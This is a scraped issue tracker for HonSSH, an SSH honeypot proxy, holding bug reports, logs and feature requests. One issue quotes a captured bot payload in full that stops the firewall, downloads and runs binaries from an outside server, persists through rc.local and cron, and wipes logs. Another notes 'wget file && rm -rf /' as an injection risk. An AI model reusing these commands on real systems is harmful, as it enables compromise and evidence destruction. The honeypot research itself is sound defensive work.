tnich / honssh Goto Github PK
View Code? Open in Web Editor NEWHonSSH is designed to log all SSH communications between a client and server.
Home Page: https://github.com/tnich/honssh
License: BSD 3-Clause "New" or "Revised" License
HonSSH is designed to log all SSH communications between a client and server.
Home Page: https://github.com/tnich/honssh
License: BSD 3-Clause "New" or "Revised" License
!!! This project is no longer maintained. !!! HonSSH https://github.com/tnich/honssh Copyright (C) 2016 Thomas Nicholson HonSSH is designed to be used in conjunction with a high interaction honeypot. HonSSH sits between the attacker and the honey pot and creates two separate SSH conncetions. ---- Read the wiki - https://github.com/tnich/honssh/wiki --- HonSSH is inspired and partly based on Kippo. https://github.com/desaster/kippo Parts of this project are using the kippo code and their copyright still remains with Upi Tamminen.
(Feature request by proxy :) )
If I may give a feature request for next version that would be:
- accept any user name (or with the same modulo system with chance =)
- if !root => create an account with the provided user name of the honeypot
- if root => give root access.
Original issue reported on code.google.com by [email protected]
on 21 Oct 2014 at 3:48
Hi,
This is not a problem, just a request for advice.
What would be my best option to work with multiple honeypots behind one honssh
gateway? Can I enter several IP addresses in the honssh config file ?
Thank you.
Original issue reported on code.google.com by [email protected]
on 4 Nov 2014 at 11:35
Currently the file download option will look for commands containing "wget" and
run them on the HonSSH box. This is too greedy and needs to only extract the
http link.
e.g. wget file && rm -rf / Would be bad.
This will be fixed shortly. Until then, use file_download = false.
Original issue reported on code.google.com by [email protected]
on 16 Feb 2014 at 11:58
Hi Thomas!
This is not really an issue, its more of a cosmetic adjustment request :)
When I receive a mail saying something like this,
"""
2014-07-30 01:36:49 - Incoming connection from: 1.2.3.4:46286 -
SSH-2.0-libssh-0.1
2014-07-30 01:36:49 - Successful login - Username:[USER] Password:[PASSWORD]
"""
it would be nice to separate the 'Username:' and '[USER]' with a whitespace.
I.E:
"""
2014-07-30 01:36:49 - Incoming connection from: 1.2.3.4:46286 -
SSH-2.0-libssh-0.1
2014-07-30 01:36:49 - Successful login - Username: [USER] Password: [PASSWORD]
"""
This would make it a bit more readable.
....Yes, i know i'm crazy picky about these things :P
If you fix it - awesome! If you don't - awesome!
Cheers,
Are
Original issue reported on code.google.com by [email protected]
on 30 Jul 2014 at 8:39
What steps will reproduce the problem?
1.
In honssh.cfg, set advanced networking to 'enabled = true'
2.
Connect to the honeypot
3.
Execute 'w'. The IP addres thats shown will be that of the router, not that of
the connecting client.
What is the expected output?
When executing 'w' its expected to see the IP address of the connecting client.
What do you see instead?
The IP address of the internal gateway.
What version of the product are you using?
61a65bf9d5f8
On what operating system?
Ubuntu 12.04 LTS
Please provide any additional information below.
I've noticed this error when attackers have connected and disconnected and was
able to reproduce it with the following steps:
# -- Stopping HonSSH.
#
2014-05-16 19:09:06+0200 [-] Main loop terminated.
2014-05-16 19:09:06+0200 [-] Server Shut Down.
# -- Changing 'enabled = true' to 'enabled = false'
#
2014-05-16 19:09:10+0200 [-] Log opened.
2014-05-16 19:09:10+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-16 19:09:10+0200 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
2014-05-16 19:09:10+0200 [-] HonsshServerFactory starting on 22
2014-05-16 19:09:10+0200 [-] Starting factory
<honssh.server.HonsshServerFactory instance at 0x2474f80>
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client]
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] Disconnecting with
error, code 10
reason: user closed connection
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] connection lost
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] Stopping factory
<honssh.client.HonsshSlimClientFactory instance at 0x2474f38>
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] disabling
diffie-hellman-group-exchange because we cannot find moduli file
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] Advanced
Networking disabled - Using client_addr
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] Starting factory
<honssh.client.HonsshClientFactory instance at 0x2472b48>
# -- Making a connection to the honeypot
#
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] CONNECTION_MADE
20140516_190927 11.22.33.44 40181
2014-05-16 19:09:27+0200 [Uninitialized] New client connection
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] kex alg, key
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] outgoing:
aes128-ctr hmac-md5 none
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] incoming:
aes128-ctr hmac-md5 none
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] NEW KEYS
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] REVERSE
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] NEW KEYS
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] Client Connection
Secured
2014-05-16 19:09:28+0200 [HonsshClientTransport,client] Detected Public Key
authentication - disabling
2014-05-16 19:09:32+0200 [HonsshClientTransport,client] LOGIN_SUCCESSFUL
20140516_190932 11.22.33.44 hostmaster Hosting2014
2014-05-16 19:09:34+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
w
2014-05-16 19:09:34+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_190934 11.22.33.44 w
# -- Output from 'w'
#
$ w
19:09:50 up 4 days, 19:23, 2 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
hostmast pts/0 192.168.192.168 19:09 1.00s 0.23s 0.00s w
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
exit
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_190943 11.22.33.44 exit
2014-05-16 19:09:43+0200 [HonsshClientTransport,client] Disconnect received
from the honeypot: 192.168.192.16854
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Disconnect
received from the attacker: 11.22.33.44
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Disconnecting
with error, code 10
reason: user closed connection
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] connection lost
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Lost connection
with the attacker: 11.22.33.44
2014-05-16 19:09:44+0200 [HonsshServerTransport,0,11.22.33.44] CONNECTION_LOST
20140516_190944 11.22.33.44
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] connection lost
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] Lost connection with
the honeypot: 192.168.192.16854
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] Stopping factory
<honssh.client.HonsshClientFactory instance at 0x2472b48>
# -- Stopping HonSSH.
#
2014-05-16 19:10:41+0200 [-] Received SIGTERM, shutting down.
2014-05-16 19:10:41+0200 [-] (TCP Port 22 Closed)
2014-05-16 19:10:41+0200 [-] Stopping factory
<honssh.server.HonsshServerFactory instance at 0x2474f80>
2014-05-16 19:10:41+0200 [-] Main loop terminated.
2014-05-16 19:10:41+0200 [-] Server Shut Down.
# -- Changing 'enabled = false' to 'enabled = true'
#
2014-05-16 19:10:43+0200 [-] Log opened.
2014-05-16 19:10:43+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-16 19:10:43+0200 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
2014-05-16 19:10:43+0200 [-] HonsshServerFactory starting on 22
2014-05-16 19:10:43+0200 [-] Starting factory
<honssh.server.HonsshServerFactory instance at 0x14e8f80>
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client]
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] Disconnecting with
error, code 10
reason: user closed connection
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] connection lost
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] Stopping factory
<honssh.client.HonsshSlimClientFactory instance at 0x14e8f38>
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] disabling
diffie-hellman-group-exchange because we cannot find moduli file
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] HonSSH Interface
created
# -- First error
#
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] Error adding IP
address to HonSSH Interface - Using client_addr: Error: an inet prefix is
expected rather than "11.22.33.45/32".
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] Starting factory
<honssh.client.HonsshClientFactory instance at 0x14e6b48>
# -- Making a connection to the honeypot
#
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] CONNECTION_MADE
20140516_191047 11.22.33.44 46251
2014-05-16 19:10:47+0200 [Uninitialized] New client connection
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] kex alg, key
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] outgoing:
aes128-ctr hmac-md5 none
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] incoming:
aes128-ctr hmac-md5 none
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] NEW KEYS
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] REVERSE
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] NEW KEYS
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] Client Connection
Secured
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] Detected Public Key
authentication - disabling
2014-05-16 19:10:52+0200 [HonsshClientTransport,client] LOGIN_SUCCESSFUL
20140516_191052 11.22.33.44 hostmaster Hosting2014
2014-05-16 19:10:54+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
w
2014-05-16 19:10:54+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_191054 11.22.33.44 w
# -- Output from 'w'
#
$ w
19:11:11 up 4 days, 19:25, 2 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
hostmast pts/0 192.168.192.168 19:11 2.00s 0.24s 0.00s w
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Entered command:
exit
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] COMMAND_ENTERED
20140516_191126 11.22.33.44 exit
2014-05-16 19:11:26+0200 [HonsshClientTransport,client] Disconnect received
from the honeypot: 192.168.192.16854
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Disconnect
received from the attacker: 11.22.33.44
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Disconnecting
with error, code 10
reason: user closed connection
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] connection lost
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Lost connection
with the attacker: 11.22.33.44
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] CONNECTION_LOST
20140516_191128 11.22.33.44
# -- Second error
#
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing
IP address to HonSSH Interface: Error: an inet prefix is expected rather than
"11.22.33.45/32".
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing
POSTROUTING Rule: iptables v1.4.12: host/network `11.22.33.45' not found
Try `iptables -h' or 'iptables --help' for more information.
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing
PREROUTING Rule: iptables v1.4.12: Bad IP address "11.22.33.45"
Try `iptables -h' or 'iptables --help' for more information.
Original issue reported on code.google.com by [email protected]
on 16 May 2014 at 5:40
Currently logs look like this when arrow keys are pressed:
Entered command: wget
google.com\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[Dhttp://
Need to support all arrow keys not just up.
ETA: April 5th
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:23
Only downloads url2
Original issue reported on code.google.com by [email protected]
on 8 Jun 2014 at 1:15
I have written a small addition to send a mail, after an attacker was logged
which includes the ttylog. Maybe you are interested.
client.py:
.....
elif messageNum == 97:
if self.factory.server.isPty:
ttylog.ttylog_close(self.ttylog_file, time.time())
if self.factory.server.cfg.get('mail', 'enable') == 'true':
msg = MIMEMultipart()
msg['Subject'] = 'Attacker logged'
msg['From'] = self.factory.server.cfg.get('mail', 'from')
msg['To'] = self.factory.server.cfg.get('mail', 'to')
msg.preamble = 'An attacker was logged'
fp = open(self.ttylog_file, 'rb')
logdata = MIMEBase('application', "octet-stream")
logdata.set_payload(fp.read())
fp.close()
Encoders.encode_base64(logdata)
logdata.add_header('Content-Disposition', 'attachment', filename=os.path.basename(self.ttylog_file))
msg.attach(logdata)
s = smtplib.SMTP(self.factory.server.cfg.get('mail', 'host'))
s.sendmail(msg['From'], msg['To'], msg.as_string())
s.quit()
txtlog.log(self.txtlog_file, "Lost connection from: %s" % self.factory.server.endIP)
else:
.....
[mail]
enable = true
host = localhost
from = honssh@honssh
to = [email protected]
Original issue reported on code.google.com by [email protected]
on 1 Mar 2014 at 10:16
Another discovery:
exec-Sessions (message 98 with data = exec) do not get logged. Only
pty-sessions (message 98 with data = pty-req).
Also, message 98 with data = exec should directly logged to the tty-log as a
user input.
Here is a message-example of a DDOS-Bot which attacked my honeypot:
2014-03-01 10:35:01+0100 [HonsshServerTransport,3,116.27.9.0] SERVER:
MessageNum: 98 Encrypted
'\x00\x00\x00\x00\x00\x00\x00\x04exec\x01\x00\x00\x10\x88/etc/init.d/iptables
stop\necho "nameserver 8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4"
>> /etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /etc;chattr
-i cupsdd\ncd /root; chmod 7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall
-9 joudckfr\nkillall -9 www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9
.Mm2\nkillall -9 acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9
QQ\nkillall -9 g3\nkillall -9 2\nkillall -9 3\nkillall -9 pm\nkillall -9
qweasd\nkillall -9 tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall
-9 xudp\nkillall -9 txma\nkillall -9 mrdos64.b00\nkillall -9
mrdos32.b00\nkillall -9 kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9
jibateng\ncd /root;rm -rf dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm
-rf dir atddd\ncd /etc;rm -rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd
/etc;rm -rf dir sksapdd\ncd /etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir
xfsdxd\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsddd.*\ncd /etc;rm
-rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd /etc;rm -rf dir kysapdd.*\ncd
/etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir skysapdd.*\ncd /etc;rm -rf dir
xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir atdd\ncd /etc;rm -rf
dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm -rf dir sksapd\ncd /etc;rm -rf
dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm
-rf dir cupsdd.*\ncd /etc;rm -rf dir atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd
/etc;rm -rf dir kysapd.*\ncd /etc;rm -rf dir sksapd.*\ncd /etc;rm -rf dir
skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd /var/spool/cron; rm -rf dir
root.*\ncd /var/spool/cron; rm -rf dir root\ncd /var/spool/cron/crontabs; rm
-rf dir root.*\ncd /var/spool/cron/crontabs; rm -rf dir root\ncd
/var/spool/cron ;wget http://122.224.34.75:8182/root\ncd
/var/spool/cron/crontabs ;wget http://122.224.34.75:8182/root\ncd /etc;wget
http://122.224.34.75:8182/cupsdd\ncd /etc;wget
http://122.224.34.75:8182/ksapdd\ncd /etc;wget
http://122.224.34.75:8182/kysapdd\ncd /etc;wget
http://122.224.34.75:8182/atddd\ncd /etc;wget
http://122.224.34.75:8182/skysapdd\ncd /etc;wget
http://122.224.34.75:8182/sksapdd\ncd /etc;wget
http://122.224.34.75:8182/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >>
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\nrm -rf
/root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd /var/log > dmesg
\ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd /var/log >
boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > cups \ncd
/var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > faillog \ncd
/var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog \ncd
/var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > anaconda.log
\ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > wtmp\ncd /var/log
> utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd /var/log >
sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root >
.bash_history\nhistory -c\necho
\xcc\xe1\xca\xbe----\xc3\xfc\xc1\xee\xd6\xb4\xd0\xd0\xb3\xc9\xb9\xa6\nsleep 600'
Original issue reported on code.google.com by [email protected]
on 1 Mar 2014 at 1:10
Hello all. Can you help me with this problem please?
What steps will reproduce the problem?
1. I have installed and configured HonSSH according instructions
2. I have ran start.sh
3. After I saw this error (below) in honssh.log. And Honeypot does not record
any activity after SSH login.
2014-03-11 23:38:34+0100 [-] Log opened.
2014-03-11 23:38:34+0100 [-] twistd 12.0.0 (/usr/bin/python 2.7.3) starting up.
2014-03-11 23:38:34+0100 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
2014-03-11 23:38:34+0100 [-] HonsshServerFactory starting on 22
2014-03-11 23:38:34+0100 [-] Starting factory
<honssh.server.HonsshServerFactory instance at 0x7faaba27a5f0>
2014-03-11 23:38:34+0100 [-] Factory starting on 5123
2014-03-11 23:38:34+0100 [-] Starting factory
<twisted.internet.protocol.Factory instance at 0x7faaba27d908>
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client]
SSH-2.0-OpenSSH_6.0p1 Debian-4
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] Disconnecting with
error, code 10 reason: user closed connection
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] connection lost
2014-03-11 23:38:34+0100 [HonsshSlimClientTransport,client] Stopping factory
<honssh.client.HonsshSlimClientFactory instance at 0x7faaba27a830>
Thank you for reply.
Original issue reported on code.google.com by [email protected]
on 11 Mar 2014 at 11:11
Hi, I use local mail server and I don't have smtp auth enabled. Currently,
there is no way to make email sendings without smtp auth (kippo validates
existence of username and password variables) , so I introduced new variable
ust_smtpauth to honssh.cfg and did small change. I also fixed small typo in
email exception handling.
--- output.py.orig 2014-06-20 10:04:35.000000000 +0200
+++ output.py 2014-06-20 10:17:24.000000000 +0200
@@ -269,11 +269,12 @@
s.ehlo()
if self.cfg.get('email', 'use_tls') == 'true':
s.starttls()
- s.login(self.cfg.get('email', 'username'),
self.cfg.get('email', 'password'))
+ if (self.cfg.get('email', 'use_smtpauth')):
+ s.login(self.cfg.get('email', 'username'),
self.cfg.get('email', 'password'))
s.sendmail(msg['From'], msg['To'].split(','), msg.as_string())
s.quit() #End send mail code
except Exception, ex:
- log.msg('[OUTPUT][EMAIL][ERR] - ' + str(e))
+ log.msg('[OUTPUT][EMAIL][ERR] - ' + str(ex))
def wget(self, wgetCommand, link, fileOut):
sp = subprocess.Popen(wgetCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
Cheers,
Pawel
Original issue reported on code.google.com by [email protected]
on 20 Jun 2014 at 8:27
:)
Original issue reported on code.google.com by [email protected]
on 14 Sep 2014 at 5:50
Add an option to email after every successful login.
ETA: April 5th
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:21
What steps will reproduce the problem?
1.
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 3 Mar 2014 at 8:23
Just a little enhancement idea: add an option to the .cfg to log all
SSH-messages and not only the unknown, like you accidentially did in client.py
in commit 8c6edd0779f4
Original issue reported on code.google.com by [email protected]
on 1 Mar 2014 at 6:09
No email notification of an attack once an EXEC session has finished.
Original issue reported on code.google.com by [email protected]
on 29 Apr 2014 at 9:14
This ticket is only created as a quick reminder for you.
The file 'honssh/requirements' has been pushed with 0755 permissions, maybe it
should be 0644 instead?
Original issue reported on code.google.com by bifrozt.development
on 8 Jun 2014 at 11:46
What steps will reproduce the problem?
Not quite sure, it appears to be intermittent.
Its occurring during connections from different attackers but, not on every
connection. The only common denominator is that all of the instances where this
occurs, the attack is coming from a Chinese based IP address.
What is the expected output?
Not seeing these errors? :P
What do you see instead?
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 586, in _doReadOrWrite
why = selectable.doRead()
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 199, in doRead
rval = self.protocol.dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/opt/honssh/honssh/server.py", line 216, in dispatchMessage
self.client.sendPacket(messageNum, payload)
exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'
What version of the product are you using?
46d8a98155cc
On what operating system?
Ubuntu server 12.04
Please provide any additional information below.
I've added a log file containing all the errors.
I might be wrong but, i think we saw this error before?
Left me know if you want the adv-logs as well.
//Are
Original issue reported on code.google.com by [email protected]
on 10 Aug 2014 at 1:15
To fix.
Original issue reported on code.google.com by [email protected]
on 31 May 2014 at 8:37
What steps will reproduce the problem?
1. The honssh.log reaches the point where it should be rotated and a new
logfile created
2. When the old log files is moved to honssh.log.1 and a new honssh.log is
created its permissions seems to be set to 0600
What is the expected output?
Expected log file permissions to be 0640 or 0644
What do you see instead?
Log file permissions are set to 0600
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 25 Mar 2014 at 9:12
When an unknown packet arrives before the client logged in, the current honssh
crashes, because the session-log is not available:
2014-03-02 06:46:52+0100 [Uninitialized] New client connection
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] REVERSE
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] NEW KEYS
2014-03-02 06:46:52+0100 [HonsshClientTransport,client] Client Connection
Secured
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] kex alg, key
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] outgoing:
aes256-ctr hmac-sha1 none
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] incoming:
aes256-ctr hmac-sha1 none
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] NEW KEYS
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] SERVER:
MessageNum: 5 Encrypted '\x00\x00\x00\x0cssh-userauth'
2014-03-02 06:46:53+0100 [HonsshClientTransport,client] CLIENT: MessageNum: 6
Encrypted '\x00\x00\x00\x0cssh-userauth'
2014-03-02 06:46:53+0100 [HonsshServerTransport,8,183.44.100.88] SERVER:
MessageNum: 50 Encrypted
'\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x04none'
2014-03-02 06:46:53+0100 [HonsshClientTransport,client] CLIENT: MessageNum: 51
Encrypted '\x00\x00\x00\x12publickey,password\x00'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] SERVER:
MessageNum: 50 Encrypted
'\x00\x00\x00\x04root\x00\x00\x00\x0essh-connection\x00\x00\x00\x08password\x00\
x00\x00\x00\x06123456'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
why = selectable.doRead()
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in doRead
return self._dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 221, in _dataReceived
rval = self.protocol.dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/home/hooster/honssh/honssh/server.py", line 187, in dispatchMessage
txtlog.log(self.txtlog_file, "Unknown SSH Packet detected - Please raise a HonSSH issue on google code with the details: %s - %s" % (str(messageNum), repr(payload)))
File "/home/hooster/honssh/honssh/txtlog.py", line 40, in log
f = file(logfile, 'a')
exceptions.IOError: [Errno 2] No such file or directory: 'sessions/183.44.100.88/20140302_064652.log'
2014-03-02 06:46:54+0100 [HonsshServerTransport,8,183.44.100.88] connection lost
Original issue reported on code.google.com by [email protected]
on 2 Mar 2014 at 11:02
Hello. Can you help me with e-mail alerting feature please? I have activated
this feature in config file. And I have entered data about my SMTP server and
mail account too. But after SSH login e-mail does not send. honssh.log does not
contain any informations about this failure. I use version 1.2.2 and Debian 7.4.
Thank you for replies.
Original issue reported on code.google.com by [email protected]
on 27 Mar 2014 at 10:19
Allow attackers to manipulate files by SFTP (currently disabled)
Parse and log all activity.
ETA: ???
Original issue reported on code.google.com by [email protected]
